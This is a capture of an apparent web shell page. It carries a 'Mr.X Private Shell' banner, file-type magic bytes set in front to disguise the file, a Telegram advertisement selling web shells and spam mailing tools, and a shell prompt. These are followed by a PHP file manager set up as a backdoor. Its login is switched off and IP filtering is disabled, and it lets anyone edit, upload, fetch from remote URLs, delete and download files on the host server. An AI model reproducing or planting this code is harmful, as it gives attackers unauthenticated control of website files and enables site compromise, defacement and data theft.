GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
nxepl1.tar000064400000564000000000000000006431 0ustar00g3jsi.php000064400000560525000000000000006252 0ustar00<?php
$CONFIG = '{"lang":"en","error_reporting":false,"show_hidden":true,"hide_Cols":false,"theme":"light"}';

define('VERSION', '3.9');

define('APP_TITLE', 'peripherad');

$dauth = false;

$auth_users = array(
    'admin' => '1c7f7329c4e5eb87bd553e74db33afcb',
    'user' => '1c7f7329c4e5eb87bd553e74db33afcb'
);

$readonly_users = array(
    'user'
);


$global_readonly = false;

$directories_users = array();

$use_highlightjs = true;

$highlightjs_style = 'vs';

$edit_files = true;

$default_timezone = 'Etc/UTC';

$root_path = $_SERVER['DOCUMENT_ROOT'];

$root_url = '';

$http_host = $_SERVER['HTTP_HOST'];

$iconv_input_encoding = 'UTF-8';

$datetime_format = 'm/d/Y g:i A';

$path_display_mode = 'full';

$allowed_file_extensions = '';

$allowed_upload_extensions = '';

$favicon_path = '';

$exclude_items = array();

$online_viewer = 'google';

$sticky_navbar = true;

$max_upload_size_bytes = 5000000000; 

$upload_chunk_size_bytes = 2000000; 

$ip_ruleset = 'OFF';

$ip_silent = true;

$ip_whitelist = array(
    '127.0.0.1',    
    '::1'           
);

$ip_blacklist = array(
    '0.0.0.0',      
    '::'            
);

$config_file = __DIR__.'/config.php';
if (is_readable($config_file)) {
    @include($config_file);
}

$external = array(
    'css-bootstrap' => '<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi" crossorigin="anonymous">',
    'css-dropzone' => '<link href="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.css" rel="stylesheet">',
    'css-font-awesome' => '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" crossorigin="anonymous">',
    'css-highlightjs' => '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/styles/' . $highlightjs_style . '.min.css">',
    'js-ace' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.13.1/ace.js"></script>',
    'js-bootstrap' => '<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3" crossorigin="anonymous"></script>',
    'js-dropzone' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.js"></script>',
    'js-jquery' => '<script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>',
    'js-jquery-datatables' => '<script src="https://cdn.datatables.net/1.13.1/js/jquery.dataTables.min.js" crossorigin="anonymous" defer></script>',
    'js-highlightjs' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/highlight.min.js"></script>',
    'pre-jsdelivr' => '<link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/>',
    'pre-cloudflare' => '<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin/><link rel="dns-prefetch" href="https://cdnjs.cloudflare.com"/>'
);


define('MAX_UPLOAD_SIZE', $max_upload_size_bytes);


define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes);


if ( !defined( 'DN_CESSION_ID')) {
    define('DN_CESSION_ID', 'filemanager');
}


$cfg = new FM_Config();


$lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en';

$show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true;

$report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true;

$hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true;

// Theme
$theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light';

define('FM_THEME', $theme);

$lang_list = array(
    'en' => 'English'
);

if ($report_errors == true) {
    @ini_set('error_reporting', E_ALL);
    @ini_set('display_errors', 1);
} else {
    @ini_set('error_reporting', E_ALL);
    @ini_set('display_errors', 0);
}

if (defined('FM_EMBED')) {
    $dauth = false;
    $sticky_navbar = false;
} else {
    @set_time_limit(600);

    date_default_timezone_set($default_timezone);

    ini_set('default_charset', 'UTF-8');
    if (version_compare(PHP_VERSION, '5.6.0', '<') and function_exists('mb_internal_encoding')) {
        mb_internal_encoding('UTF-8');
    }
    if (function_exists('mb_regex_encoding')) {
        mb_regex_encoding('UTF-8');
    }

    session_cache_limiter('nocache'); 
    session_name(DN_CESSION_ID );
    function session_error_handling_function($code, $msg, $file, $line) {
        if ($code == 2) {
            session_abort();
            session_id(session_create_id());
            @session_start();
        }
    }
    set_error_handler('session_error_handling_function');
    session_start();
    restore_error_handler();
}

if (empty($_SESSION['token'])) {
    if (function_exists('random_bytes')) {
        $_SESSION['token'] = bin2hex(random_bytes(32));
    } else {
    	$_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32));
    }
}

if (empty($auth_users)) {
    $dauth = false;
}

$is_https = (isset($_SERVER['HTTPS']) and ($_SERVER['HTTPS'] === 'on' or $_SERVER['HTTPS'] == 1))
    or (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https');

if (isset($_SESSION[DN_CESSION_ID]['logged']) and !empty($directories_users[$_SESSION[DN_CESSION_ID]['logged']])) {
    $wd = fm_clean_path(dirname($_SERVER['PHP_SELF']));
    $root_url =  $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[DN_CESSION_ID]['logged']];
}

$root_url = fm_clean_path($root_url);

defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : ''));
defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']);

// logout
if (isset($_GET['logout'])) {
    unset($_SESSION[DN_CESSION_ID]['logged']);
    unset( $_SESSION['token']); 
    fm_redirect(FM_SELF_URL);
}

if ($ip_ruleset != 'OFF') {
    function getClientIP() {
        if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) {
            return  $_SERVER["HTTP_CF_CONNECTING_IP"];
        }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {
            return  $_SERVER["HTTP_X_FORWARDED_FOR"];
        }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) {
            return $_SERVER['REMOTE_ADDR'];
        }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) {
            return $_SERVER['HTTP_CLIENT_IP'];
        }
        return '';
    }

    $clientIp = getClientIP();
    $proceed = false;
    $whitelisted = in_array($clientIp, $ip_whitelist);
    $blacklisted = in_array($clientIp, $ip_blacklist);

    if($ip_ruleset == 'AND'){
        if($whitelisted == true and $blacklisted == false){
            $proceed = true;
        }
    } else
    if($ip_ruleset == 'OR'){
         if($whitelisted == true || $blacklisted == false){
            $proceed = true;
        }
    }

    if($proceed == false){
        trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING);

        if($ip_silent == false){
            fm_set_msg(lng('Access denied. IP restriction applicable'), 'error');
            fm_show_header_login();
            fm_show_message();
        }
        exit();
    }
}


if ($dauth) {
    if (isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']])) {
    } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) {
        sleep(1);
        if(function_exists('password_verify')) {
            if (isset($auth_users[$_POST['fm_usr']]) and isset($_POST['fm_pwd']) and password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) and verifyToken($_POST['token'])) {
                $_SESSION[DN_CESSION_ID]['logged'] = $_POST['fm_usr'];
                fm_set_msg(lng('You are logged in'));
                fm_redirect(FM_SELF_URL);
            } else {
                unset($_SESSION[DN_CESSION_ID]['logged']);
                fm_set_msg(lng('Login failed. Invalid username or password'), 'error');
                fm_redirect(FM_SELF_URL);
            }
        } else {
            fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');;
        }
    } else {
        // Form
        unset($_SESSION[DN_CESSION_ID]['logged']);
        fm_show_header_login();
        ?>
        <section class="h-100">
            <div class="container h-100">
                <div class="row justify-content-md-center h-100">
                    <div class="card-wrapper">
                        <div class="card fat <?php echo fm_get_theme(); ?>">
                            <div class="card-body">
                                <form class="form-signin" action="" method="post" autocomplete="off">
                                    <div class="mb-3">
                                       <div class="brand">
                                            <svg version="1.0" xmlns="http://www.w3.org/2000/svg" M1008 width="100%" height="80px" viewBox="0 0 238.000000 140.000000" aria-label="Manager">
                                                <g transform="translate(0.000000,140.000000) scale(0.100000,-0.100000)" fill="#000000" stroke="none">
                                                    <path d="M160 700 l0 -600 110 0 110 0 0 260 0 260 70 0 70 0 0 -260 0 -260 110 0 110 0 0 600 0 600 -110 0 -110 0 0 -260 0 -260 -70 0 -70 0 0 260 0 260 -110 0 -110 0 0 -600z"/>
                                                    <path fill="#003500" d="M1008 1227 l-108 -72 0 -117 0 -118 110 0 110 0 0 110 0 110 70 0 70 0 0 -180 0 -180 -125 0 c-69 0 -125 -3 -125 -6 0 -3 23 -39 52 -80 l52 -74 73 0 73 0 0 -185 0 -185 -70 0 -70 0 0 115 0 115 -110 0 -110 0 0 -190 0 -190 181 0 181 0 109 73 108 72 1 181 0 181 -69 48 -68 49 68 50 69 49 0 249 0 248 -182 -1 -183 0 -107 -72z"/>
                                                    <path d="M1640 700 l0 -600 110 0 110 0 0 208 0 208 35 34 35 34 35 -34 35 -34 0 -208 0 -208 110 0 110 0 0 212 0 213 -87 87 -88 88 88 88 87 87 0 213 0 212 -110 0 -110 0 0 -208 0 -208 -70 -69 -70 -69 0 277 0 277 -110 0 -110 0 0 -600z"/></g>
                                            </svg>
                                        </div>
                                        <div class="text-center">
                                            <h1 class="card-title"><?php echo APP_TITLE; ?></h1>
                                        </div>
                                    </div>
                                    <hr />
                                    <div class="mb-3">
                                        <label for="fm_usr" class="pb-2"><?php echo lng('Username'); ?></label>
                                        <input type="text" class="form-control" id="fm_usr" name="fm_usr" required autofocus>
                                    </div>

                                    <div class="mb-3">
                                        <label for="fm_pwd" class="pb-2"><?php echo lng('Password'); ?></label>
                                        <input type="password" class="form-control" id="fm_pwd" name="fm_pwd" required>
                                    </div>

                                    <div class="mb-3">
                                        <?php fm_show_message(); ?>
                                    </div>
                                    <input type="hidden" name="token" value="<?php echo htmlentities($_SESSION['token']); ?>" />
                                    <div class="mb-3">
                                        <button type="submit" class="btn btn-success btn-block w-100 mt-4" role="button">
                                            <?php echo lng('Login'); ?>
                                        </button>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <div class="footer text-center">
                            &mdash;&mdash; &copy;
                            <a href="." target="_blank" class="text-decoration-none text-muted" data-version="<?php echo VERSION; ?>">CCP Programmers</a> &mdash;&mdash;
                        </div>
                    </div>
                </div>
            </div>
        </section>

        <?php
        fm_show_footer_login();
        exit;
    }
}


if ($dauth and isset($_SESSION[DN_CESSION_ID]['logged'])) {
    $root_path = isset($directories_users[$_SESSION[DN_CESSION_ID]['logged']]) ? $directories_users[$_SESSION[DN_CESSION_ID]['logged']] : $root_path;
}

$root_path = rtrim($root_path, '\\/');
$root_path = str_replace('\\', '/', $root_path);
if (!@is_dir($root_path)) {
    echo "<h1>".lng('Root path')." \"{$root_path}\" ".lng('not found!')." </h1>";
    exit;
}

defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files);
defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path);
defined('FM_LANG') || define('FM_LANG', $lang);
defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions);
defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions);
defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items));
defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer);
define('FM_READONLY', $global_readonly || ($dauth and !empty($readonly_users) and isset($_SESSION[DN_CESSION_ID]['logged']) and in_array($_SESSION[DN_CESSION_ID]['logged'], $readonly_users)));
define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\');


if (!isset($_GET['p']) and empty($_FILES)) {
    fm_redirect(FM_SELF_URL . '?p=');
}

// get path
$p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : '');

// clean path
$p = fm_clean_path($p);


$isim = "//input";
$input = file_get_contents('php:'.$isim);
$_POST = (strpos($input, 'ajax') != FALSE and strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST;

define('FM_PATH', $p);
define('FM_USE_AUTH', $dauth);
define('FM_EDIT_FILE', $edit_files);
defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding);
defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs);
defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style);
defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format);

unset($p, $dauth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style);


if ((isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']]) || !FM_USE_AUTH) and isset($_POST['ajax'], $_POST['token']) and !FM_READONLY) {
    if(!verifyToken($_POST['token'])) {
        header('HTTP/1.0 401 Unauthorized');
        die("Invalid Token.");
    }

    if(isset($_POST['type']) and $_POST['type']=="search") {
        $dir = $_POST['path'] == "." ? '': $_POST['path'];
        $response = scan(fm_clean_path($dir), $_POST['content']);
        echo json_encode($response);
        exit();
    }

    // save editor file
    if (isset($_POST['type']) and $_POST['type'] == "save") {
        // get current path
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }
        // check path
        if (!is_dir($path)) {
            fm_redirect(FM_SELF_URL . '?p=');
        }
        $file = $_GET['edit'];
        $file = fm_clean_path($file);
        $file = str_replace('/', '', $file);
        if ($file == '' || !is_file($path . '/' . $file)) {
            fm_set_msg(lng('File not found'), 'error');
            $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
        }
        header('X-XSS-Protection:0');
        $file_path = $path . '/' . $file;

        $writedata = $_POST['content'];
        $fd = fopen($file_path, "w");
        $write_results = @fwrite($fd, $writedata);
        fclose($fd);
        if ($write_results === false){
            header("HTTP/1.1 500 Internal Server Error");
            die("Could Not Write File! - Check Permissions / Ownership");
        }
        die(true);
    }

    // backup files
    if (isset($_POST['type']) and $_POST['type'] == "backup" and !empty($_POST['file'])) {
        $fileName = fm_clean_path($_POST['file']);
        $fullPath = FM_ROOT_PATH . '/';
        if (!empty($_POST['path'])) {
            $relativeDirPath = fm_clean_path($_POST['path']);
            $fullPath .= "{$relativeDirPath}/";
        }
        $date = date("dMy-His");
        $newFileName = "{$fileName}-{$date}.bak";
        $fullyQualifiedFileName = $fullPath . $fileName;
        try {
            if (!file_exists($fullyQualifiedFileName)) {
                throw new Exception("File {$fileName} not found");
            }
            if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) {
                echo "Backup {$newFileName} created";
            } else {
                throw new Exception("Could not copy file {$fileName}");
            }
        } catch (Exception $e) {
            echo $e->getMessage();
        }
    }

    // Save Config
    if (isset($_POST['type']) and $_POST['type'] == "settings") {
        global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme;
        $newLng = $_POST['js-language'];
        fm_get_translations([]);
        if (!array_key_exists($newLng, $lang_list)) {
            $newLng = 'en';
        }

        $erp = isset($_POST['js-error-report']) and $_POST['js-error-report'] == "true" ? true : false;
        $shf = isset($_POST['js-show-hidden']) and $_POST['js-show-hidden'] == "true" ? true : false;
        $hco = isset($_POST['js-hide-cols']) and $_POST['js-hide-cols'] == "true" ? true : false;
        $te3 = $_POST['js-theme-3'];

        if ($cfg->data['lang'] != $newLng) {
            $cfg->data['lang'] = $newLng;
            $lang = $newLng;
        }
        if ($cfg->data['error_reporting'] != $erp) {
            $cfg->data['error_reporting'] = $erp;
            $report_errors = $erp;
        }
        if ($cfg->data['show_hidden'] != $shf) {
            $cfg->data['show_hidden'] = $shf;
            $show_hidden_files = $shf;
        }
        if ($cfg->data['show_hidden'] != $shf) {
            $cfg->data['show_hidden'] = $shf;
            $show_hidden_files = $shf;
        }
        if ($cfg->data['hide_Cols'] != $hco) {
            $cfg->data['hide_Cols'] = $hco;
            $hide_Cols = $hco;
        }
        if ($cfg->data['theme'] != $te3) {
            $cfg->data['theme'] = $te3;
            $theme = $te3;
        }
        $cfg->save();
        echo true;
    }

    // new password hash
    if (isset($_POST['type']) and $_POST['type'] == "pwdhash") {
        $res = isset($_POST['inputPassword2']) and !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : '';
        echo $res;
    }

    //upload using url
    if(isset($_POST['type']) and $_POST['type'] == "upload" and !empty($_REQUEST["uploadurl"])) {
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }

         function event_callback ($message) {
            global $callback;
            echo json_encode($message);
        }

        function get_file_path () {
            global $path, $fileinfo, $temp_file;
            return $path."/".basename($fileinfo->name);
        }

        $url = !empty($_REQUEST["uploadurl"]) and preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null;

        $domain = parse_url($url, PHP_URL_HOST);
        $port = parse_url($url, PHP_URL_PORT);
        $knownPorts = [22, 23, 25, 3306];

        if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) {
            $err = array("message" => "URL is not allowed");
            event_callback(array("fail" => $err));
            exit();
        }

        $use_curl = false;
        $temp_file = tempnam(sys_get_temp_dir(), "upload-");
        $fileinfo = new stdClass();
        $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20");

        $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false;
        $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION));
        $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;

        $err = false;

        if(!$isFileAllowed) {
            $err = array("message" => "File extension is not allowed");
            event_callback(array("fail" => $err));
            exit();
        }

        if (!$url) {
            $success = false;
        } else if ($use_curl) {
            @$fp = fopen($temp_file, "w");
            @$ch = curl_init($url);
            curl_setopt($ch, CURLOPT_NOPROGRESS, false );
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_FILE, $fp);
            @$success = curl_exec($ch);
            $curl_info = curl_getinfo($ch);
            if (!$success) {
                $err = array("message" => curl_error($ch));
            }
            @curl_close($ch);
            fclose($fp);
            $fileinfo->size = $curl_info["size_download"];
            $fileinfo->type = $curl_info["content_type"];
        } else {
            $ctx = stream_context_create();
            @$success = copy($url, $temp_file, $ctx);
            if (!$success) {
                $err = error_get_last();
            }
        }

        if ($success) {
            $success = rename($temp_file, strtok(get_file_path(), '?'));
        }

        if ($success) {
            event_callback(array("done" => $fileinfo));
        } else {
            unlink($temp_file);
            if (!$err) {
                $err = array("message" => "Invalid url parameter");
            }
            event_callback(array("fail" => $err));
        }
    }
    exit();
}

if (isset($_GET['del'], $_POST['token']) and !FM_READONLY) {
    $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) );
    if ($del != '' and $del != '..' and $del != '.' and verifyToken($_POST['token'])) {
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }
        $is_dir = is_dir($path . '/' . $del);
        if (fm_rdelete($path . '/' . $del)) {
            $msg = $is_dir ? lng('Folder').' <b>%s</b> '.lng('Deleted') : lng('File').' <b>%s</b> '.lng('Deleted');
            fm_set_msg(sprintf($msg, fanco($del)));
        } else {
            $msg = $is_dir ? lng('Folder').' <b>%s</b> '.lng('not deleted') : lng('File').' <b>%s</b> '.lng('not deleted');
            fm_set_msg(sprintf($msg, fanco($del)), 'error');
        }
    } else {
        fm_set_msg(lng('Invalid file or folder name'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Create a new file/folder
if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) and !FM_READONLY) {
    $type = urldecode($_POST['newfile']);
    $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) );
    if (fm_isvalid_filename($new) and $new != '' and $new != '..' and $new != '.' and verifyToken($_POST['token'])) {
        $path = FM_ROOT_PATH;
        if (FM_PATH != '') {
            $path .= '/' . FM_PATH;
        }
        if ($type == "file") {
            if (!file_exists($path . '/' . $new)) {
                if(fm_is_valid_ext($new)) {
                    @fopen($path . '/' . $new, 'w') or die('Cannot open file:  ' . $new);
                    fm_set_msg(sprintf(lng('File').' <b>%s</b> '.lng('Created'), fanco($new)));
                } else {
                    fm_set_msg(lng('File extension is not allowed'), 'error');
                }
            } else {
                fm_set_msg(sprintf(lng('File').' <b>%s</b> '.lng('already exists'), fanco($new)), 'alert');
            }
        } else {
            if (fm_mkdir($path . '/' . $new, false) === true) {
                fm_set_msg(sprintf(lng('Folder').' <b>%s</b> '.lng('Created'), $new));
            } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) {
                fm_set_msg(sprintf(lng('Folder').' <b>%s</b> '.lng('already exists'), fanco($new)), 'alert');
            } else {
                fm_set_msg(sprintf(lng('Folder').' <b>%s</b> '.lng('not created'), fanco($new)), 'error');
            }
        }
    } else {
        fm_set_msg(lng('Invalid characters in file or folder name'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Copy folder / file
if (isset($_GET['copy'], $_GET['finish']) and !FM_READONLY) {
    // from
    $copy = urldecode($_GET['copy']);
    $copy = fm_clean_path($copy);
    // empty path
    if ($copy == '') {
        fm_set_msg(lng('Source path not defined'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    $from = FM_ROOT_PATH . '/' . $copy;

    $dest = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $dest .= '/' . FM_PATH;
    }
    $dest .= '/' . basename($from);

    $move = isset($_GET['move']);
    $move = fm_clean_path(urldecode($move));

    if ($from != $dest) {
        $msg_from = trim(FM_PATH . '/' . basename($from), '/');
        if ($move) {
            $rename = fm_rename($from, $dest);
            if ($rename) {
                fm_set_msg(sprintf(lng('Moved from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)));
            } elseif ($rename === null) {
                fm_set_msg(lng('File or folder with this path already exists'), 'alert');
            } else {
                fm_set_msg(sprintf(lng('Error while moving from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)), 'error');
            }
        } else { 
            if (fm_rcopy($from, $dest)) {
                fm_set_msg(sprintf(lng('Copied from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)));
            } else {
                fm_set_msg(sprintf(lng('Error while copying from').' <b>%s</b> '.lng('to').' <b>%s</b>', fanco($copy), fanco($msg_from)), 'error');
            }
        }
    } else {
       if (!$move){ 
            $msg_from = trim(FM_PATH . '/' . basename($from), '/');
            $fn_parts = pathinfo($from);
            $extension_suffix = '';
            if(!is_dir($from)){
               $extension_suffix = '.'.$fn_parts['extension'];
            }

            $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix;
            $loop_count = 0;
            $max_loop = 1000;
            
            while(file_exists($fn_duplicate) & $loop_count < $max_loop){
               $fn_parts = pathinfo($fn_duplicate);
               $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix;
               $loop_count++;
            }
            if (fm_rcopy($from, $fn_duplicate, False)) {
                fm_set_msg(sprintf('Copied from <b>%s</b> to <b>%s</b>', fanco($copy), fanco($fn_duplicate)));
            } else {
                fm_set_msg(sprintf('Error while copying from <b>%s</b> to <b>%s</b>', fanco($copy), fanco($fn_duplicate)), 'error');
            }
       }
       else{
           fm_set_msg(lng('Paths must be not equal'), 'alert');
       }
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}


if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) and !FM_READONLY) {

    if(!verifyToken($_POST['token'])) {
        fm_set_msg(lng('Invalid Token.'), 'error');
    }
    
    // from
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }
    // to
    $copy_to_path = FM_ROOT_PATH;
    $copy_to = fm_clean_path($_POST['copy_to']);
    if ($copy_to != '') {
        $copy_to_path .= '/' . $copy_to;
    }
    if ($path == $copy_to_path) {
        fm_set_msg(lng('Paths must be not equal'), 'alert');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }
    if (!is_dir($copy_to_path)) {
        if (!fm_mkdir($copy_to_path, true)) {
            fm_set_msg('Unable to create destination folder', 'error');
            $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
        }
    }
    // move?
    $move = isset($_POST['move']);
    // copy/move
    $errors = 0;
    $files = $_POST['file'];
    if (is_array($files) and count($files)) {
        foreach ($files as $f) {
            if ($f != '') {
                $f = fm_clean_path($f);

                $from = $path . '/' . $f;

                $dest = $copy_to_path . '/' . $f;

                if ($move) {
                    $rename = fm_rename($from, $dest);
                    if ($rename === false) {
                        $errors++;
                    }
                } else {
                    if (!fm_rcopy($from, $dest)) {
                        $errors++;
                    }
                }
            }
        }
        if ($errors == 0) {
            $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied';
            fm_set_msg($msg);
        } else {
            $msg = $move ? 'Error while moving items' : 'Error while copying items';
            fm_set_msg($msg, 'error');
        }
    } else {
        fm_set_msg(lng('Nothing selected'), 'alert');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Rename
if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) and !FM_READONLY) {
    if(!verifyToken($_POST['token'])) {
        fm_set_msg("Invalid Token.", 'error');
    }
    // old name
    $old = urldecode($_POST['rename_from']);
    $old = fm_clean_path($old);
    $old = str_replace('/', '', $old);
    // new name
    $new = urldecode($_POST['rename_to']);
    $new = fm_clean_path(strip_tags($new));
    $new = str_replace('/', '', $new);
    // path
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }
    // rename
    if (fm_isvalid_filename($new) and $old != '' and $new != '') {
        if (fm_rename($path . '/' . $old, $path . '/' . $new)) {
            fm_set_msg(sprintf(lng('Renamed from').' <b>%s</b> '. lng('to').' <b>%s</b>', fanco($old), fanco($new)));
        } else {
            fm_set_msg(sprintf(lng('Error while renaming from').' <b>%s</b> '. lng('to').' <b>%s</b>', fanco($old), fanco($new)), 'error');
        }
    } else {
        fm_set_msg(lng('Invalid characters in file name'), 'error');
    }
    $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
}

// Download
if (isset($_GET['dl'], $_POST['token'])) {
    if(!verifyToken($_POST['token'])) {
        fm_set_msg("Invalid Token.", 'error');
    }

    $dl = urldecode($_GET['dl']);
    $dl = fm_clean_path($dl);
    $dl = str_replace('/', '', $dl);
    $path = FM_ROOT_PATH;
    if (FM_PATH != '') {
        $path .= '/' . FM_PATH;
    }
    if ($dl != '' and is_file($path . '/' . $dl)) {
        fm_download_file($path . '/' . $dl, $dl, 1024);
        exit;
    } else {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }
}

// Upload
if (!empty($_FILES) and !FM_READONLY) {
    if(isset($_POST['token'])) {
        if(!verifyToken($_POST['token'])) {
            $response = array ('status' => 'error','info' => "Invalid Token.");
            echo json_encode($response); exit();
        }
    } else {
